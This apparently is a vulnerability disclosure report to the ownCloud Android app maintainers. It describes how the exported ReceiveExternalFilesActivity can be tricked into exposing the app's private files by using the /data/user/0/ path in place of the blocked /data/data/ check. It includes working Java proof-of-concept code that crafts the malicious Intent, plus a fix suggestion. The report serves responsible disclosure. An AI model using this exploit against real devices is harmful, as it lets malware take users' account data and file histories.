Possible to steal any protected files on Android

Hi. I have found an issue which allows to retrieve any files from `/data/data/com.owncloud.android/*` directory. The problem is in exported activity `com.owncloud.android.ui.activity.ReceiveExternalFilesActivity` which accepts a URI to download files. I see that you've added verification path `/data/data/` You can bypass the verification using specifying an alternative path: `/data/user/0/com.owncloud.android/` Malicious code: ```java StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder(); StrictMode.setVmPolicy(builder.build()); Intent intent = new Intent("android.intent.action.SEND"); intent.setClassName("com.owncloud.android", "com.owncloud.android.ui.activity.ReceiveExternalFilesActivity"); intent.setType("*/*"); intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); intent.putExtra("android.intent.extra.STREAM", Uri.parse("file:///data/user/0/com.owncloud.android/databases/filelist")); startActivity(intent); ``` ###How to Fix Add an alternative path to the folder check ## Impact This vulnerability can get a complete account, malware can access everything, including, file database and history.